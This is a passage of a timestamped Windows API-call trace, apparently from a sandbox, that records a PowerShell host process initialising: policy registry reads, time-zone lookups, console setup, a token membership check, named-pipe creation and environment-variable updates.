lpOldMode=0xdbe7c0) returned 1 [0133.842] CoCreateGuid (in: pguid=0xdbe850 | out: pguid=0xdbe850*(Data1=0x3bd29c4c, Data2=0xe7c6, Data3=0x400d, Data4=([0]=0xba, [1]=0x75, [2]=0x22, [3]=0x6e, [4]=0x13, [5]=0x6d, [6]=0x73, [7]=0x87))) returned 0x0 [0133.847] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe730 | out: phkResult=0xdbe730*=0x0) returned 0x2 [0133.974] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\Transcription", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe730 | out: phkResult=0xdbe730*=0x0) returned 0x2 [0133.987] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdbddcc, nSize=0xfa | out: lpBuffer="䳆玮屆ꢗ\x14\x01徠玩哨؍䤀玮憊ꢗ") returned 0x0 [0133.995] CreateFileW (lpFileName="CONOUT$" (normalized: "\\device\\condrv\\currentout"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x65c [0134.290] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0xdbe7dc | out: lpConsoleScreenBufferInfo=0xdbe7dc) returned 1 [0134.413] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x65c, lpConsoleScreenBufferInfo=0xdbe7dc | out: lpConsoleScreenBufferInfo=0xdbe7dc) returned 1 [0134.762] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0xdbe840 | out: lpMode=0xdbe840) returned 1 [0135.096] SetConsoleMode (hConsoleHandle=0x65c, dwMode=0x7) returned 1 [0135.803] GetConsoleMode (in: hConsoleHandle=0x65c, lpMode=0xdbe840 | out: lpMode=0xdbe840) returned 1 [0136.015] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ConsoleSessionConfiguration", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe7bc | out: phkResult=0xdbe7bc*=0x0) returned 0x2 [0136.020] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Policies\\Microsoft\\Windows\\PowerShell\\ConsoleSessionConfiguration", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe7bc | out: phkResult=0xdbe7bc*=0x0) returned 0x2 [0136.021] GetConsoleCP () returned 0x1b5 [0137.522] GetCurrentConsoleFontEx (in: hConsoleOutput=0x65c, bMaximumWindow=0, lpConsoleCurrentFontEx=0xdbe790 | out: lpConsoleCurrentFontEx=0xdbe790) returned 1 [0137.645] SetConsoleCtrlHandler (HandlerRoutine=0x7252ca6, Add=1) returned 1 [0137.646] GetStdHandle (nStdHandle=0xfffffff5) returned 0x90 [0137.646] GetFileType (hFile=0x90) returned 0x2 [0137.647] GetConsoleMode (in: hConsoleHandle=0x90, lpMode=0xdbe85c | out: lpMode=0xdbe85c) returned 1 [0137.742] GetStdHandle (nStdHandle=0xfffffff6) returned 0x8c [0137.742] GetFileType (hFile=0x8c) returned 0x2 [0137.743] GetConsoleMode (in: hConsoleHandle=0x8c, lpMode=0xdbe838 | out: lpMode=0xdbe838) returned 1 [0137.839] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdbe068*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdbe068*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x95, [1]=0x4b, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0137.945] CoCreateGuid (in: pguid=0xdbe71c | out: pguid=0xdbe71c*(Data1=0x312acda9, Data2=0xfec7, Data3=0x4a18, Data4=([0]=0xaa, [1]=0xc, [2]=0xc2, [3]=0x9e, [4]=0x94, [5]=0xcc, [6]=0x82, [7]=0x15))) returned 0x0 [0137.955] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0xdbe74c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0xdbe74c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x95, [1]=0x4b, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0138.240] EtwEventRegister (in: ProviderId=0x51576f4, EnableCallback=0x7252cce, CallbackContext=0x0, RegHandle=0x51576d0 | out: RegHandle=0x51576d0) returned 0x0 [0138.240] EtwEventSetInformation (RegHandle=0x7623e20, InformationClass=0x4f, EventInformation=0x2, InformationLength=0x51576a4) returned 0x0 [0138.243] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0138.243] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x7626310 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0138.243] CoTaskMemFree (pv=0x7626310) [0138.243] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0138.243] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0138.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0xdbdc98, nSize=0xfa | out: lpBuffer="䳆玮抒ꢗ\x14\x01徠玩哨؍?盬㋪Ȍ") returned 0x0 [0138.254] GetCurrentProcessId () returned 0x514 [0138.255] OpenProcess (dwDesiredAccess=0x1000, bInheritHandle=0, dwProcessId=0x514) returned 0x64c [0138.256] GetProcessTimes (in: hProcess=0x64c, lpCreationTime=0x5158588, lpExitTime=0x5158590, lpKernelTime=0x5158598, lpUserTime=0x51585a0 | out: lpCreationTime=0x5158588, lpExitTime=0x5158590, lpKernelTime=0x5158598, lpUserTime=0x51585a0) returned 1 [0138.256] CloseHandle (hObject=0x64c) returned 1 [0138.257] GetDynamicTimeZoneInformation (in: pTimeZoneInformation=0xdbd4f4 | out: pTimeZoneInformation=0xdbd4f4) returned 0x1 [0138.263] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbd5d8 | out: phkResult=0xdbd5d8*=0x64c) returned 0x0 [0138.264] RegQueryValueExW (in: hKey=0x64c, lpValueName="TZI", lpReserved=0x0, lpType=0xdbd5f4, lpData=0x0, lpcbData=0xdbd5f0*=0x0 | out: lpType=0xdbd5f4*=0x3, lpData=0x0, lpcbData=0xdbd5f0*=0x2c) returned 0x0 [0138.264] RegQueryValueExW (in: hKey=0x64c, lpValueName="TZI", lpReserved=0x0, lpType=0xdbd5f4, lpData=0x5158fa4, lpcbData=0xdbd5f0*=0x2c | out: lpType=0xdbd5f4*=0x3, lpData=0x5158fa4*, lpcbData=0xdbd5f0*=0x2c) returned 0x0 [0138.264] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Time Zones\\W. Europe Standard Time\\Dynamic DST", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbd42c | out: phkResult=0xdbd42c*=0x0) returned 0x2 [0138.266] RegQueryValueExW (in: hKey=0x64c, lpValueName="MUI_Display", lpReserved=0x0, lpType=0xdbd5cc, lpData=0x0, lpcbData=0xdbd5c8*=0x0 | out: lpType=0xdbd5cc*=0x1, lpData=0x0, lpcbData=0xdbd5c8*=0x20) returned 0x0 [0138.266] RegQueryValueExW (in: hKey=0x64c, lpValueName="MUI_Display", lpReserved=0x0, lpType=0xdbd5cc, lpData=0x51593f8, lpcbData=0xdbd5c8*=0x20 | out: lpType=0xdbd5cc*=0x1, lpData="@tzres.dll,-320", lpcbData=0xdbd5c8*=0x20) returned 0x0 [0138.266] RegQueryValueExW (in: hKey=0x64c, lpValueName="MUI_Std", lpReserved=0x0, lpType=0xdbd5cc, lpData=0x0, lpcbData=0xdbd5c8*=0x0 | out: lpType=0xdbd5cc*=0x1, lpData=0x0, lpcbData=0xdbd5c8*=0x20) returned 0x0 [0138.267] RegQueryValueExW (in: hKey=0x64c, lpValueName="MUI_Std", lpReserved=0x0, lpType=0xdbd5cc, lpData=0x5159450, lpcbData=0xdbd5c8*=0x20 | out: lpType=0xdbd5cc*=0x1, lpData="@tzres.dll,-322", lpcbData=0xdbd5c8*=0x20) returned 0x0 [0138.267] RegQueryValueExW (in: hKey=0x64c, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0xdbd5cc, lpData=0x0, lpcbData=0xdbd5c8*=0x0 | out: lpType=0xdbd5cc*=0x1, lpData=0x0, lpcbData=0xdbd5c8*=0x20) returned 0x0 [0138.267] RegQueryValueExW (in: hKey=0x64c, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0xdbd5cc, lpData=0x51594a8, lpcbData=0xdbd5c8*=0x20 | out: lpType=0xdbd5cc*=0x1, lpData="@tzres.dll,-321", lpcbData=0xdbd5c8*=0x20) returned 0x0 [0138.270] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0138.295] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7626310 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0138.295] CoTaskMemFree (pv=0x7626310) [0138.299] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0138.299] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0xdbd5e8, pwszFileMUIPath=0x7626310, pcchFileMUIPath=0xdbd5ec, pululEnumerator=0xdbd5e0 | out: pwszLanguage=0x0, pcchLanguage=0xdbd5e8, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0xdbd5ec, pululEnumerator=0xdbd5e0) returned 1 [0138.302] CoTaskMemFree (pv=0x0) [0138.303] CoTaskMemFree (pv=0x7626310) [0138.304] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x7280001 [0138.305] CoTaskMemAlloc (cb=0x3ec) returned 0x1332a20 [0138.306] LoadStringW (in: hInstance=0x7280001, uID=0x140, lpBuffer=0x1332a20, cchBufferMax=500 | out: lpBuffer="(UTC+01:00) Amsterdam, Berlin, Bern, Rome, Stockholm, Vienna") returned 0x3c [0138.306] CoTaskMemFree (pv=0x1332a20) [0138.306] FreeLibrary (hLibModule=0x7280001) returned 1 [0138.307] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0138.307] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7626310 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0138.307] CoTaskMemFree (pv=0x7626310) [0138.307] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0138.307] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0xdbd5e8, pwszFileMUIPath=0x7626310, pcchFileMUIPath=0xdbd5ec, pululEnumerator=0xdbd5e0 | out: pwszLanguage=0x0, pcchLanguage=0xdbd5e8, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0xdbd5ec, pululEnumerator=0xdbd5e0) returned 1 [0138.308] CoTaskMemFree (pv=0x0) [0138.308] CoTaskMemFree (pv=0x7626310) [0138.308] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x7280001 [0138.309] CoTaskMemAlloc (cb=0x3ec) returned 0x1332a20 [0138.309] LoadStringW (in: hInstance=0x7280001, uID=0x142, lpBuffer=0x1332a20, cchBufferMax=500 | out: lpBuffer="W. Europe Standard Time") returned 0x17 [0138.309] CoTaskMemFree (pv=0x1332a20) [0138.309] FreeLibrary (hLibModule=0x7280001) returned 1 [0138.309] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0138.310] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x7626310 | out: pszPath="C:\\WINDOWS\\system32") returned 0x0 [0138.310] CoTaskMemFree (pv=0x7626310) [0138.310] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0138.310] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\WINDOWS\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0xdbd5e8, pwszFileMUIPath=0x7626310, pcchFileMUIPath=0xdbd5ec, pululEnumerator=0xdbd5e0 | out: pwszLanguage=0x0, pcchLanguage=0xdbd5e8, pwszFileMUIPath="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0xdbd5ec, pululEnumerator=0xdbd5e0) returned 1 [0138.310] CoTaskMemFree (pv=0x0) [0138.310] CoTaskMemFree (pv=0x7626310) [0138.310] LoadLibraryExW (lpLibFileName="C:\\WINDOWS\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x7280001 [0138.311] CoTaskMemAlloc (cb=0x3ec) returned 0x1332a20 [0138.311] LoadStringW (in: hInstance=0x7280001, uID=0x141, lpBuffer=0x1332a20, cchBufferMax=500 | out: lpBuffer="W. Europe Daylight Time") returned 0x17 [0138.311] CoTaskMemFree (pv=0x1332a20) [0138.311] FreeLibrary (hLibModule=0x7280001) returned 1 [0138.312] RegCloseKey (hKey=0x64c) returned 0x0 [0138.317] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x60f94e8, Length=0x28e38, ResultLength=0xdbd808 | out: SystemInformation=0x60f94e8, ResultLength=0xdbd808*=0x1b2a8) returned 0x0 [0138.426] CreateWellKnownSid (in: WellKnownSidType=0x1a, DomainSid=0x0, pSid=0x51867f8, cbSid=0xdbd838 | out: pSid=0x51867f8*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), cbSid=0xdbd838) returned 1 [0138.432] GetCurrentProcess () returned 0xffffffff [0138.432] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0xdbd7e4 | out: TokenHandle=0xdbd7e4*=0x64c) returned 1 [0138.432] GetTokenInformation (in: TokenHandle=0x64c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xdbd7e8 | out: TokenInformation=0x0, ReturnLength=0xdbd7e8) returned 0 [0138.432] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1337388 [0138.432] GetTokenInformation (in: TokenHandle=0x64c, TokenInformationClass=0x8, TokenInformation=0x1337388, TokenInformationLength=0x4, ReturnLength=0xdbd7e8 | out: TokenInformation=0x1337388, ReturnLength=0xdbd7e8) returned 1 [0138.433] LocalFree (hMem=0x1337388) returned 0x0 [0138.433] DuplicateTokenEx (in: hExistingToken=0x64c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xdbd7f0 | out: phNewToken=0xdbd7f0*=0x650) returned 1 [0138.433] CheckTokenMembership (in: TokenHandle=0x650, SidToCheck=0x5186d18*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xdbd800 | out: IsMember=0xdbd800) returned 1 [0138.433] CloseHandle (hObject=0x650) returned 1 [0138.507] CreateNamedPipeW (lpName="\\\\.\\pipe\\PSHost.132288216588311934.1300.DefaultAppDomain.powershell" (normalized: "\\device\\namedpipe\\pshost.132288216588311934.1300.defaultappdomain.powershell"), dwOpenMode=0x40080003, dwPipeMode=0x6, nMaxInstances=0x1, nOutBufferSize=0x8000, nInBufferSize=0x8000, nDefaultTimeOut=0x0, lpSecurityAttributes=0xdbd7a4) returned 0x650 [0138.615] GetFileType (hFile=0x650) returned 0x3 [0139.589] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0139.589] GetEnvironmentVariableW (in: lpName="PathEXT", lpBuffer=0x7626310, nSize=0x104 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0139.589] CoTaskMemFree (pv=0x7626310) [0139.631] SetEnvironmentVariableW (lpName="PathEXT", lpValue=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 1 [0141.392] CoCreateGuid (in: pguid=0xdbd650 | out: pguid=0xdbd650*(Data1=0xba34ae4, Data2=0x9915, Data3=0x453e, Data4=([0]=0x8d, [1]=0x92, [2]=0xae, [3]=0x4b, [4]=0x10, [5]=0x81, [6]=0x63, [7]=0x62))) returned 0x0 [0141.939] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0141.939] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x7626310, nSize=0x104 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5d [0141.939] CoTaskMemFree (pv=0x7626310) [0141.940] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0xdbe4ac, nSize=0x64 | out: lpDst="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x5e [0141.941] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe588 | out: phkResult=0xdbe588*=0x6a4) returned 0x0 [0141.941] RegQueryValueExW (in: hKey=0x6a4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdbe5a4, lpData=0x0, lpcbData=0xdbe5a0*=0x0 | out: lpType=0xdbe5a4*=0x2, lpData=0x0, lpcbData=0xdbe5a0*=0xbc) returned 0x0 [0141.941] RegQueryValueExW (in: hKey=0x6a4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdbe5a4, lpData=0x51c9588, lpcbData=0xdbe5a0*=0xbc | out: lpType=0xdbe5a4*=0x2, lpData="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpcbData=0xdbe5a0*=0xbc) returned 0x0 [0141.941] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%", lpDst=0xdbe408, nSize=0x64 | out: lpDst="C:\\Program Files (x86)") returned 0x17 [0141.941] ExpandEnvironmentStringsW (in: lpSrc="%\\WindowsPowerShell\\Modules;%", lpDst=0xdbe408, nSize=0x64 | out: lpDst="%\\WindowsPowerShell\\Modules;%") returned 0x1e [0141.941] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0xdbe408, nSize=0x64 | out: lpDst="C:\\WINDOWS") returned 0xb [0141.942] ExpandEnvironmentStringsW (in: lpSrc="%ProgramFiles%\\WindowsPowerShell\\Modules;%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0xdbe408, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0141.942] RegCloseKey (hKey=0x6a4) returned 0x0 [0141.942] ExpandEnvironmentStringsW (in: lpSrc="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules", lpDst=0xdbe4ac, nSize=0x64 | out: lpDst="C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x64 [0141.942] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe588 | out: phkResult=0xdbe588*=0x6a4) returned 0x0 [0141.943] RegQueryValueExW (in: hKey=0x6a4, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0xdbe5a4, lpData=0x0, lpcbData=0xdbe5a0*=0x0 | out: lpType=0xdbe5a4*=0x0, lpData=0x0, lpcbData=0xdbe5a0*=0x0) returned 0x2 [0141.943] RegCloseKey (hKey=0x6a4) returned 0x0 [0141.943] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0141.944] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x7626310 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0141.944] CoTaskMemFree (pv=0x7626310) [0141.944] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x17 [0141.944] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)", nBufferLength=0x17, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)", lpFilePart=0x0) returned 0x16 [0141.945] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0141.945] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7626310, nSize=0x104 | out: lpBuffer="미ijघijrogram Files (x86)") returned 0x0 [0141.946] CoTaskMemFree (pv=0x7626310) [0141.946] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbe548 | out: phkResult=0xdbe548*=0x6a4) returned 0x0 [0141.947] RegQueryValueExW (in: hKey=0x6a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe568, lpData=0x0, lpcbData=0xdbe564*=0x0 | out: lpType=0xdbe568*=0x1, lpData=0x0, lpcbData=0xdbe564*=0x56) returned 0x0 [0141.947] RegQueryValueExW (in: hKey=0x6a4, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbe568, lpData=0x51cb0cc, lpcbData=0xdbe564*=0x56 | out: lpType=0xdbe568*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdbe564*=0x56) returned 0x0 [0141.947] RegCloseKey (hKey=0x6a4) returned 0x0 [0141.947] ExpandEnvironmentStringsW (in: lpSrc="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules", lpDst=0xdbe490, nSize=0x64 | out: lpDst="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules") returned 0x33 [0141.948] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x772d0000 [0141.950] GetProcAddress (hModule=0x772d0000, lpProcName="IsWow64Process") returned 0x772e5a20 [0141.950] GetCurrentProcess () returned 0xffffffff [0141.950] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0xdbe5e4 | out: Wow64Process=0xdbe5e4) returned 1 [0141.950] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0141.950] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x7626310 | out: pszPath="C:\\Users\\FD1HVy\\Documents") returned 0x0 [0141.953] CoTaskMemFree (pv=0x7626310) [0141.953] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x1a [0141.953] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x1a, lpBuffer=0x133ac60, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0141.953] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Users\\FD1HVy\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files (x86)\\WindowsPowerShell\\Modules;C:\\WINDOWS\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 1 [0142.183] CoTaskMemAlloc (cb=0x20c) returned 0x7626310 [0142.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x7626310, nSize=0x104 | out: lpBuffer="미ijघijsers\\FD1HVy\\Documents") returned 0x0 [0142.184] CoTaskMemFree (pv=0x7626310) [0142.543] EtwEventRegister (in: ProviderId=0x51d4184, EnableCallback=0x7252d56, CallbackContext=0x0, RegHandle=0x51d4160 | out: RegHandle=0x51d4160) returned 0x0 [0142.543] EtwEventSetInformation (RegHandle=0x7622908, InformationClass=0x54, EventInformation=0x2, InformationLength=0x51d4114) returned 0x0 [0142.767] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\3\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xdbde78 | out: phkResult=0xdbde78*=0x6ac) returned 0x0 [0142.768] RegQueryValueExW (in: hKey=0x6ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbde98, lpData=0x0, lpcbData=0xdbde94*=0x0 | out: lpType=0xdbde98*=0x1, lpData=0x0, lpcbData=0xdbde94*=0x56) returned 0x0 [0142.768] RegQueryValueExW (in: hKey=0x6ac, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xdbde98, lpData=0x51e8478, lpcbData=0xdbde94*=0x56 | out: lpType=0xdbde98*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xdbde94*=0x56) returned 0x0 [0142.768] RegCloseKey (hKey=0x6ac) returned 0x0 [0143.045] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xf0df2800, Data2=0xb8ed, Data3=0x4d3d, Data4=([0]=0x8a, [1]=0xe4, [2]=0xdf, [3]=0xea, [4]=0xce, [5]=0xf9, [6]=0x59, [7]=0x12))) returned 0x0 [0143.045] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x718bbef3, Data2=0x60a5, Data3=0x47cb, Data4=([0]=0xa2, [1]=0x80, [2]=0xdf, [3]=0x96, [4]=0xb6, [5]=0x85, [6]=0xd3, [7]=0x60))) returned 0x0 [0143.046] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x6ad42b80, Data2=0xac27, Data3=0x4cb2, Data4=([0]=0xbf, [1]=0x6d, [2]=0xbd, [3]=0xe0, [4]=0xf2, [5]=0x55, [6]=0xef, [7]=0x90))) returned 0x0 [0143.046] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x47bf51b7, Data2=0xa3a8, Data3=0x4238, Data4=([0]=0xa1, [1]=0x6a, [2]=0xca, [3]=0x16, [4]=0x11, [5]=0xb4, [6]=0xd6, [7]=0x3a))) returned 0x0 [0143.046] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x93d928af, Data2=0x299e, Data3=0x4a0b, Data4=([0]=0x8f, [1]=0x4a, [2]=0x6, [3]=0x1e, [4]=0xba, [5]=0x5d, [6]=0x3c, [7]=0x94))) returned 0x0 [0143.046] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0xa815d3c3, Data2=0x45c2, Data3=0x4d82, Data4=([0]=0x9a, [1]=0x42, [2]=0x14, [3]=0xae, [4]=0x1e, [5]=0xfb, [6]=0x40, [7]=0x96))) returned 0x0 [0143.046] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x6e6b7fc9, Data2=0xdbe0, Data3=0x4b26, Data4=([0]=0x8b, [1]=0xf3, [2]=0xa, [3]=0xb1, [4]=0xa4, [5]=0xf8, [6]=0x70, [7]=0x4a))) returned 0x0 [0143.046] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x85faf0dc, Data2=0x2bfa, Data3=0x4a1a, Data4=([0]=0xa6, [1]=0x87, [2]=0x23, [3]=0xc4, [4]=0x1d, [5]=0x7e, [6]=0x65, [7]=0x93))) returned 0x0 [0143.061] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x26f1acf2, Data2=0x1bc4, Data3=0x44db, Data4=([0]=0x85, [1]=0xa8, [2]=0x2, [3]=0xd, [4]=0xcb, [5]=0xa3, [6]=0x54, [7]=0x6d))) returned 0x0 [0143.061] CoCreateGuid (in: pguid=0xdbbd24 | out: pguid=0xdbbd24*(Data1=0x1c938022, Data2=0xfa6c, 